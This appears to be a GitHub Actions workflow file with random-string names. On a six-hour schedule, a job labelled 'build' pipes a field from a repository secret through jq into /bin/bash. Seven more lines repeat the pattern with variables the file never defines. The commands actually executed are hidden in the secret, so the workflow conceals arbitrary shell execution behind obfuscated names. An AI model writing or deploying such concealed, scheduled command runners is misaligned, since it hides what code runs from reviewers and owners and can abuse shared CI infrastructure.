name: liurushi6781
on:
  workflow_dispatch:
  schedule:
    - cron: '10 0/6 * * *'
jobs:
  build:
    runs-on: ubuntu-latest
    steps:
      - uses: actions/checkout@v4
      - name: liurushi6781
        env:
          ldclv1: ${{ secrets.ldclv1 }}
        run: |
          echo $ldclv1 | jq -r .xcnpq351 | /bin/bash
          echo $sw8341 | jq -r .ufmod2553 | /bin/bash
          echo $oo77 | jq -r .t61635 | /bin/bash
          echo $tba692 | jq -r .e4 | /bin/bash
          echo $enpmo2 | jq -r .cwk33802 | /bin/bash
          echo $ovrba53547 | jq -r .chog670 | /bin/bash
          echo $d469 | jq -r .ll22921 | /bin/bash
          echo $c0527 | jq -r .us48459 | /bin/bash

